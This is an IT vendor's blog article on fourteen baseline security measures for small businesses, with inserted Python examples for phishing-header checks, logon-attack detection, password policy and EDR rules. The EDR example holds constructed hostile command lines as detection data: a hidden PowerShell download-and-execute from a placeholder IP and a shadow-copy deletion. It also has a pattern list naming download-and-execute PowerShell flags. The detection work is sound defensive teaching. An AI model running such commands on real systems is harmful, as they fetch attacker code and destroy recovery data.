14 Foundational Cyber Security Measures Small & Midsize Businesses Need in 2021
Hackers are getting more sophisticated. The minimum security protections that businesses need to defend against cyber criminals have changed.
As cyber criminals have advanced the technology they use to sneak in (or bust through) network doors, the list of must-have cyber security "basics" has expanded.
To have a fighting chance, you need a layered cyber security strategy.
It might be hard to know what those layers should be if you're not a technology specialist. You may just have a gut feeling that what you’re doing right now isn't enough. We're here to help.
Here are 14 foundational cyber security measures that small and midsize businesses need in 2021 to protect against today's threats.
Cyber Security Basics For a Strong Foundation
- Anti‐Virus / Anti‐Malware
- Anti‐Spam
- Patch Management
- Firewall Management
- Windows Log Alerts
- Password Policy
- Multi‐Factor Authentication
- Secure Internet Gateway
- Gateway Anti‐Virus
- Backup and Disaster Recovery
- Active Directory Management
- Office 365 Email Encryption
- Endpoint Detection & Response
- Security Awareness Training
1. Anti-Virus / Anti-Malware
Hackers have many methods of installing malware on computers. Whether it’s through a compromised website or clicking a link in a phishing email, viruses, worms and trojans can wreak havoc once they’ve made their way onto an employee’s computer -- and then to your network.
Once in place, malware can monitor and steal information from your system, encrypt your data and demand a ransom, or cause other damage including corrupting your hard drive.
Anti-virus and anti-malware have long been cyber security standards and they continue to be a must-have layer of defense. These programs scan the devices on your network looking for known malware, matching files against signatures that the vendor updates as new samples are found. Once found, the unwanted program is quarantined so that it can’t spread. Then actions are taken to remove it from the affected devices. Because the matching depends on signatures, keep the definitions current and make sure the software can't simply be switched off by the user.
2. Anti-Spam
Anti-spam programs filter fraudulent email messages before they reach your users' inboxes. Spam emails can appear to be from people or organizations that you know, like an executive at your company or a business that is well known like UPS or Amazon. Through social engineering, these messages entice people to click on a link or open an attachment which then downloads a malware payload, or to wire money to the attacker.
Anti-spam software scores each message against sender reputation, sender-authentication checks such as SPF, DKIM and DMARC, and content analysis, and blocks or quarantines messages that score as unwanted before they reach the inbox. With modern anti-spam software you can tune the settings to your needs: you can release legitimate messages that were caught by mistake, allow specific senders through a whitelist, and block others outright.
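As an added example (not code from the article or from any product it mentions), here are the kinds of header checks an anti-spam or anti-phishing filter applies, run over two constructed messages: one impersonating an executive, one legitimate. The internal domain, the executive names, the sender addresses and the Authentication-Results line are all made up for the illustration; a real gateway adds that header itself after checking SPF, DKIM and DMARC.

```python
"""Header heuristics of the kind an anti-spam gateway applies (added example)."""
import re
from email import message_from_string
from email.utils import parseaddr

# Assumptions for the example: the organisation's own domain and the display
# names of executives that attackers commonly impersonate.
INTERNAL_DOMAIN = "example.com"
EXECUTIVES = {"jane doe", "pat lee"}
AUTH_FAILURES = {"fail", "softfail", "permerror"}


def analyse_message(raw: str) -> list:
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    msg = message_from_string(raw)
    findings = []
    from_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = from_addr.rpartition("@")[2].lower()
    internal = from_domain == INTERNAL_DOMAIN or from_domain.endswith("." + INTERNAL_DOMAIN)

    # 1. Display-name impersonation: claims to be an executive but sent from outside.
    if from_name.strip().lower() in EXECUTIVES and not internal:
        findings.append(f"display name '{from_name}' impersonates an executive from {from_domain}")

    # 2. Reply-To pointing somewhere other than the sender (typical of invoice/wire fraud).
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if reply_addr and reply_addr.rpartition("@")[2].lower() != from_domain:
        findings.append(f"Reply-To domain differs from From domain ({reply_addr})")

    # 3. Sender-authentication results the receiving gateway recorded.
    auth = msg.get("Authentication-Results", "")
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", auth)
        if m and m.group(1).lower() in AUTH_FAILURES:
            findings.append(f"{mech}={m.group(1)}")

    # 4. Lookalike domain: our own name embedded in a domain we don't own.
    if not internal and INTERNAL_DOMAIN.split(".")[0] in from_domain:
        findings.append(f"lookalike sender domain {from_domain}")
    return findings


# Constructed sample messages (not real mail).
PHISHING = """\
From: Jane Doe <jane.doe@example-com-mail.net>
Reply-To: Jane Doe <j.doe.ceo@webmail-invalid.test>
To: accounts@example.com
Subject: Urgent: wire transfer needed today
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=example-com-mail.net; dkim=none; dmarc=fail header.from=example-com-mail.net

I'm in a meeting and can't talk. Please wire the attached invoice amount now.
"""

LEGITIMATE = """\
From: Jane Doe <jane.doe@example.com>
To: accounts@example.com
Subject: Q3 numbers
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com; dkim=pass header.d=example.com; dmarc=pass header.from=example.com

See attached.
"""

if __name__ == "__main__":
    for label, raw in (("phishing", PHISHING), ("legitimate", LEGITIMATE)):
        print(label, analyse_message(raw))
```

Real filters combine dozens of such signals with reputation data and weigh them rather than alerting on any one, but these four catch the executive-impersonation pattern described above.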
3. Patch Management
Patch management refers to the ongoing work of applying software updates that close security holes. Software developers support their products by regularly releasing updates as weaknesses are detected. In addition to patching newly found security holes, updates can also include changes that improve the performance of the software.
Cyber criminals are actively looking for computers that are running unpatched or out-of-support software so that they can exploit known vulnerabilities. This includes your operating systems as well as any software that you’re using on your servers, workstations, laptops, and connected devices.
Your IT team should be reviewing, testing, and deploying patches on an ongoing basis, prioritizing by how severe the vulnerability is and whether the affected system is reachable from the internet. Software that is out of support gets no patches at all, so it needs to be upgraded, replaced, or isolated rather than left running.
4. Firewall Management
Firewalls are a primary barrier between all your sensitive data and cyber criminals. A firewall examines all incoming and outgoing traffic on your network. It controls this traffic by following sets of rules that determine what is allowed and not allowed – or trusted and not trusted.
Firewalls need diligent management to make sure that there aren’t any holes where cyber criminals can sneak in. This includes proper configuration (starting from a default-deny rule set and opening only what's needed), testing, regular firmware updates, and periodic review of the rule set to remove temporary or forgotten rules. Employees working from home should also have firewalls on their home networks and the host-based firewall enabled on their laptops, since you don't manage their home routers.
5. Windows Log Alerts
Your Windows operating system records events in the Windows Event Log. Some of that information is used by network administrators to monitor and tune performance, and the Security log in particular records logons, failed logons, account changes, and privilege use, provided that audit policy is enabled and the logs are collected centrally before an attacker can clear them.
As security events are written, monitoring software can send automated alerts when something looks suspicious. For example, a burst of failed logins (event ID 4625) against one account from a single source, or a few failures against many accounts from the same source, suggests someone is trying to guess passwords. Another example is a user logging in successfully from a country or device they have never used before. The Security log won't tell you about excessive use of computing power on its own, but a sudden sustained spike reported by performance monitoring can signal that the computer has been commandeered into a botnet.
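To make the password-guessing alerts concrete, here is an added example (not code from the article) that runs the two detections over a constructed export of Security-log events: a brute-force burst against one account that ends in a successful logon, and a "password spray" where one source tries a single guess against many accounts. The CSV layout, the thresholds and the IP addresses are all assumptions for the illustration; in production the same logic runs in a SIEM over events collected from every machine.

```python
"""Detect password guessing in exported Windows Security-log events (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample export (not real data). Columns: time, event ID, account, source IP.
# 4625 = failed logon, 4624 = successful logon.
SAMPLE_EVENTS = """\
2021-03-01T08:00:01,4625,alice,203.0.113.7
2021-03-01T08:00:03,4625,alice,203.0.113.7
2021-03-01T08:00:05,4625,alice,203.0.113.7
2021-03-01T08:00:07,4625,alice,203.0.113.7
2021-03-01T08:00:09,4625,alice,203.0.113.7
2021-03-01T08:00:11,4625,alice,203.0.113.7
2021-03-01T08:00:15,4624,alice,203.0.113.7
2021-03-01T08:10:00,4625,bob,198.51.100.9
2021-03-01T08:10:02,4625,carol,198.51.100.9
2021-03-01T08:10:04,4625,dave,198.51.100.9
2021-03-01T08:10:06,4625,erin,198.51.100.9
2021-03-01T08:10:08,4625,frank,198.51.100.9
2021-03-01T09:00:00,4625,alice,192.0.2.5
2021-03-01T09:00:20,4624,alice,192.0.2.5
"""


def parse_events(text):
    events = []
    for line in text.strip().splitlines():
        ts, eid, account, src = line.split(",")
        events.append({"time": datetime.fromisoformat(ts), "id": int(eid),
                       "account": account, "src": src})
    return sorted(events, key=lambda e: e["time"])


def _burst(times, threshold, window):
    """True if `threshold` timestamps fall inside any span of length `window`."""
    times = sorted(times)
    return any(times[i + threshold - 1] - times[i] <= window
               for i in range(len(times) - threshold + 1))


def find_brute_force(events, threshold=5, window=timedelta(minutes=5)):
    """Many failures against one account from one source."""
    fails = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            fails[(e["src"], e["account"])].append(e["time"])
    return sorted(k for k, t in fails.items() if _burst(t, threshold, window))


def find_password_spray(events, min_accounts=5, window=timedelta(minutes=30)):
    """One source making a guess or two against many accounts. This stays under
    per-account lockout thresholds, so the brute-force rule above never fires."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            by_src[e["src"]].append(e)
    hits = []
    for src, fails in by_src.items():
        for i, first in enumerate(fails):  # events are already time-sorted
            accounts = {f["account"] for f in fails[i:] if f["time"] - first["time"] <= window}
            if len(accounts) >= min_accounts:
                hits.append(src)
                break
    return sorted(hits)


def find_success_after_failures(events, brute_force_keys):
    """Highest priority: a successful logon for a source/account pair that was being brute-forced."""
    keys = set(brute_force_keys)
    return sorted({(e["src"], e["account"]) for e in events
                   if e["id"] == 4624 and (e["src"], e["account"]) in keys})


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    bf = find_brute_force(evs)
    print("brute force:", bf)
    print("password spray:", find_password_spray(evs))
    print("success after failures:", find_success_after_failures(evs, bf))
```

The single failure followed by a success from 192.0.2.5 is a user mistyping a password and is correctly ignored; the thresholds are what separate that from an attack, so tune them to your environment's normal failure rate.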
6. Password Policy
According to Verizon's 2020 Data Breach Investigations Report, over 80 percent of breaches that involve hacking make use of brute force or lost or stolen credentials. Weak and reused passwords are a big part of that, and many businesses still have no enforced password policy. A password policy is a specific set of rules meant to enhance the security of your network. It mostly involves requiring users to set strong passwords and use them properly, and enforcing those rules technically (for example through Active Directory) rather than relying on the handbook alone.
Older guidance said to change passwords every 2-3 months. Current guidance (NIST SP 800-63B) advises against forced periodic changes, because they push users toward predictable variations of the same password; instead, require a change when there is evidence of compromise, and screen new passwords against lists of common and previously breached passwords.
Most organizations include password policies in their company handbook or separate Acceptable Use Policy.
Some organizations set up programs to train employees on security and effective password-setting techniques. For instance, a password should not be obvious or based on personal information that is easy to find, like birthdays or anniversaries, and should never be reused across work and personal accounts. Length matters more than forced mixes of character classes: a long passphrase of several unrelated words is both stronger and easier to remember than a short string of symbols, and a password manager lets users keep a unique password for every account.
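The following is an added example (not code from the article) of the checks a policy in that style would enforce at password-change time: a minimum length, a banned-list lookup, and rejection of passwords built from the username or personal details or from obvious repeats and sequences. The 12-character minimum and the banned list are assumptions; in practice the list is a breached-password corpus with millions of entries.

```python
"""Password policy checks in the style of NIST SP 800-63B (added example)."""
import re

MIN_LENGTH = 12  # assumption: the organisation's chosen minimum
# Constructed stand-in for a real breached/common-password list.
BANNED = {"password", "password1", "welcome1", "qwerty123", "letmein",
          "summer2021", "company2021"}


def _has_sequence(s, run=4):
    """True if `run` consecutive characters ascend by one each ('abcd', '1234')."""
    return any(all(ord(s[i + j + 1]) - ord(s[i + j]) == 1 for j in range(run - 1))
               for i in range(len(s) - run + 1))


def check_password(password, username="", personal_terms=()):
    """Return a list of policy violations; an empty list means the password is acceptable."""
    problems = []
    low = password.lower()
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    # Strip a trailing number so 'Password2022' is caught by the 'password' entry.
    if low in BANNED or re.sub(r"\d+$", "", low) in BANNED:
        problems.append("appears on the banned/breached list")
    for term in (username, *personal_terms):
        if term and term.lower() in low:
            problems.append(f"contains '{term}'")
    if re.search(r"(.)\1{3,}", password):
        problems.append("contains a character repeated 4+ times")
    if _has_sequence(low):
        problems.append("contains a sequential run such as 'abcd' or '1234'")
    return problems


if __name__ == "__main__":
    for pw in ("Summer2021", "Acme-JSmith-1990", "correct horse battery staple"):
        print(repr(pw), check_password(pw, username="jsmith", personal_terms=("1990",)))
```

Note what is deliberately absent: there is no rule demanding an uppercase letter, a digit and a symbol. The passphrase passes on length alone, while the short "compliant-looking" passwords fail on the banned list or on personal-information checks.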
7. Multi-factor Authentication (MFA)
Multi-factor authentication (MFA) is becoming increasingly popular as a means of securing the login process. It works by requiring an individual to take another step to verify their identity when logging into an account, such as entering a one-time code generated by an authenticator app or approving a prompt on their phone. It works because a hacker who has stolen or guessed the password is unlikely to also control the second factor. Not all second factors are equal: SMS codes can be intercepted through SIM swapping, and one-time codes and push prompts can be phished or approved out of habit, so prefer app-based codes over SMS, and use phishing-resistant options such as FIDO2 security keys for administrators and other high-value accounts.
You can combine MFA with Windows log alerts that notify you when someone logs into one of your accounts or an account that you monitor. The alerts send you an email or text message any time an event of interest occurs, so you can verify whether the login is legitimate.
8. Secure Internet Gateway
If you're doing any operations over the internet (and who isn’t??), you need some additional protection for the traffic going in and out of your network to the web with a secure internet gateway.
It's similar to (but not the same as) a firewall. A secure internet gateway is a cloud-delivered filtering service that sits between your users and the internet: it inspects DNS requests and web traffic and blocks connections to known malicious or suspicious destinations, such as phishing sites and malware command-and-control servers, before the connection is made.
Businesses use a Secure Internet Gateway as another layer of security to protect their users from malicious internet traffic and malware downloads as they browse. It's especially useful for remote workers or devices at branch offices, because the protection follows the device wherever it connects rather than depending on the office firewall.
9. Gateway Anti-Virus
Modern firewalls have some additional capabilities that help businesses build up the digital perimeter around their network -- gateway anti-virus is one of them. This feature works in a manner similar to standard anti-virus, in that it looks for known malware in the traffic passing through the firewall and blocks it.
Your firewall's job is to control traffic in and out of your network, so having gateway anti-virus allows you to spot and shut down malware in emails or web pages BEFORE they even get to employee workstations and laptops. Humans are prone to make mistakes and can be manipulated into clicking, downloading, or browsing in a way that triggers a malware download. Gateway anti-virus means you’re putting one more layer between the bad guys and your employees. Keep in mind that most web traffic is now encrypted with HTTPS, so gateway anti-virus only sees page content if the firewall is configured to decrypt and inspect that traffic (TLS inspection); without it, the gateway can block by destination but not by content.
10. Backup and Disaster Recovery
In the event that hackers manage to penetrate your security perimeter and processes, you need to have a contingency plan. Data backup and disaster recovery are important components of your response. Your backup plan should be based on what data you need to resume operations, how much data you can afford to lose (your recovery point objective, or RPO), and how long you can afford to be down (your recovery time objective, or RTO).
Data backup used to be considered sufficient insurance against ransomware, because all you needed to do was restore your systems if your data was taken hostage. Not anymore. Cyber criminals now use extortion as well, stealing the data before encrypting it and threatening to publish it on the web if the ransom isn't paid. They also go after the backups themselves, so at least one copy should be offline or immutable, where an attacker holding your administrator credentials can't delete or encrypt it.
Back up your data as part of your incident response plan, test that you can actually restore from those backups within your RTO, but don’t rely on backups as your ONLY response.
11. Active Directory Management
Active Directory acts as a central user management tool and is important for security in a couple of ways.
First, it’s a way that you can enforce some of your data access policies. Through Active Directory you can allow or deny users to take certain actions or touch certain files based on what they need to know for their job role.
If a user tries to do something outside the permissions that are set up, the resulting access-denied events in the Security log can trigger a Windows Log Alert. Follow-up is then needed to determine whether the behavior was a genuine threat or just a mistake.
Active Directory is very familiar to hackers, so proper management is essential -- just imagine what a bad guy could do if they stole the power to change accounts and permissions! Proper management includes hardening the configuration rather than leaving it at its defaults, keeping the number of domain administrators to a minimum, giving administrators separate accounts for day-to-day work and for administration, protecting those administrator accounts with MFA, and disabling accounts promptly when people leave.
12. Office 365 Email Encryption
Microsoft Office 365 is one of the most convenient office applications that businesses use nowadays. The cloud-based platform gives people the tools they need and enables collaboration through various email and calendaring applications, as well as Microsoft Teams. Plus, you can use it on any device, at any time.
However, email travels across networks you don't control and sits in mailboxes that can be compromised, and this is where Office 365 Email Encryption comes in. It has various encryption options you can use to protect sensitive email sent from Office 365, so that only the intended recipient can read the message and, with the 'Do Not Forward' option, the recipient can't forward or copy it. Note that encryption protects the message content; it does not protect you if an attacker has taken over the sender's or recipient's account, which is another reason MFA matters.
To create a secure message, create a new email in Outlook, open the Options tab, choose Encrypt, and select the restriction you want to apply (such as Encrypt-Only or Do Not Forward).
13. Endpoint Detection and Response (EDR)
While anti-virus scans for known malware, you also need to protect your network from malware that hasn't been seen before.
This is where Endpoint Detection and Response (EDR) comes in. EDR is an agent on each device that continuously records what happens there (processes started, files changed, network connections, registry changes) and looks for suspicious behavior rather than just known signatures, often with machine-learning models on top of written detection rules. When something abnormal happens, such as a Word document launching PowerShell or a process encrypting hundreds of files, it can block the action, isolate the device from the network, and send an alert, with the recorded history available for the investigation.
EDR has been developed in response to cyber criminals' evolving tactics. If you’re only defending against known malware, you’ll always be behind. EDR should be deployed on all of the workstations, laptops, servers, and mobile devices that connect to your network. Most Internet of Things (IoT) devices can't run an EDR agent, so those need to be isolated on their own network segment and monitored from the network side instead.
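To make the difference between the anti-virus layer (section 1) and EDR concrete, here is an added example (not code from the article or from any EDR product) that puts a hash-signature scanner beside three behavioural rules run over constructed process and file telemetry. The "known bad" bytes, the signature name, the command lines, the IP address and the file paths are all made up for the illustration; real signature databases hold hashes and byte patterns of actual samples, and real EDR rule sets have hundreds of rules.

```python
"""Signature matching (anti-virus) beside behavioural rules (EDR). Added example."""
import hashlib
from collections import Counter

# ---- Signature layer: what anti-virus does ----
# Constructed stand-in for a known malicious file (not real malware).
KNOWN_BAD = b"constructed stand-in for a known malicious binary"
SIGNATURES = {hashlib.sha256(KNOWN_BAD).hexdigest(): "Trojan.Constructed.A"}


def scan_by_hash(data: bytes):
    """Return the signature name if these exact bytes are known, else None."""
    return SIGNATURES.get(hashlib.sha256(data).hexdigest())


# ---- Behavioural layer: what EDR adds ----
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
POWERSHELL_FLAGS = ("-enc", "-encodedcommand", "downloadstring", "invoke-expression", "iex ")


def evaluate_process(event):
    """Rules over one process-creation event: who launched it and with what command line."""
    parent = event["parent"].lower()
    image = event["image"].lower()
    cmd = event["cmdline"].lower()
    alerts = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        alerts.append("office application spawned a script host")
    if image == "powershell.exe" and any(flag in cmd for flag in POWERSHELL_FLAGS):
        alerts.append("suspicious PowerShell download/encoded command")
    if ("vssadmin" in image and "delete shadows" in cmd) or ("wmic" in image and "shadowcopy delete" in cmd):
        alerts.append("shadow copy deletion (ransomware precursor)")
    return alerts


def detect_mass_rename(file_events, threshold=50):
    """A process renaming many files in a short burst is how ransomware looks on disk."""
    counts = Counter(e["image"].lower() for e in file_events if e["op"] == "rename")
    return sorted(image for image, n in counts.items() if n >= threshold)


# Constructed telemetry, in the shape an EDR agent would record (not real captures).
PROCESS_EVENTS = [
    {"parent": "explorer.exe", "image": "WINWORD.EXE", "cmdline": "WINWORD.EXE invoice.docm"},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://198.51.100.20/a')"},
    {"parent": "cmd.exe", "image": "vssadmin.exe", "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]
FILE_EVENTS = (
    [{"image": "locker.exe", "op": "rename", "path": f"C:\\Users\\alice\\Documents\\{i}.docx.locked"}
     for i in range(60)]
    + [{"image": "explorer.exe", "op": "rename", "path": "C:\\Users\\alice\\notes.txt"}]
)

if __name__ == "__main__":
    # The exact known file is caught; flipping one byte produces a new hash and evades the signature.
    print(scan_by_hash(KNOWN_BAD), scan_by_hash(KNOWN_BAD + b"\x00"))
    for ev in PROCESS_EVENTS:
        print(ev["image"], evaluate_process(ev))
    print("mass rename by:", detect_mass_rename(FILE_EVENTS))
```

The hash check shows why signatures alone fall behind: a single changed byte gives a new hash, so every repacked sample is "unknown". The behavioural rules don't care what the file's bytes are; Word launching PowerShell with a download command, or any process deleting shadow copies, is suspicious whoever wrote it.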
14. Security Awareness Training
Any IT security professional will tell you that the weakest link in a company's security is its employees. Hackers use social engineering techniques and phishing to exploit unsuspecting employees to extract sensitive information and gain access to computers and networks.
This can be countered with ongoing employee security awareness training programs, in which every employee who has access to your network is formally trained on security best practices. They are educated about common threats and about how they can be coaxed into allowing a security breach. The goal of training is to teach each member of the team to actively spot the clues that indicate an attack, and to report them, so that potential cyber attacks are stopped early.
For best results, security awareness training needs to be a continuous process, included when onboarding new employees, and ongoing to keep all employees updated with new trends in the field.
Strategically Combine Layers for Best Cyber Security
While this article describes many cyber security tactics, the way they’re combined makes a big difference in how effective they’re going to be. You can’t just cobble together a bunch of tools and hope for the best. You’ll get your best protection when you have experts at the helm, determining what technology tools will create a strong defense, and supporting them with non-technical policies that guide employee behavior.
Get a Cyber Security Assessment
It can be tough for a small IT support team to manage cyber security for businesses. Cyber security is a specialized expertise that's different from traditional IT management.
Contact us today for a free cyber security assessment.
About Peter O'Campo
Peter O’Campo is Chief Technology Officer of Accent Computer Solutions, Inc. He earned his B.S. in Accounting from Azusa Pacific University in 1996. Prior to working for Accent, he successfully grew and sold three information technology companies. In his role as Accent’s CTO, Peter is responsible for advancing technology and increasing efficiency for both Accent and its clients. He stays up-to-date on the IT industry, evaluates new technology to stay ahead of the competition, implements technologies and processes to make staff more effective, as well as reviews and refines existing processes for efficiency.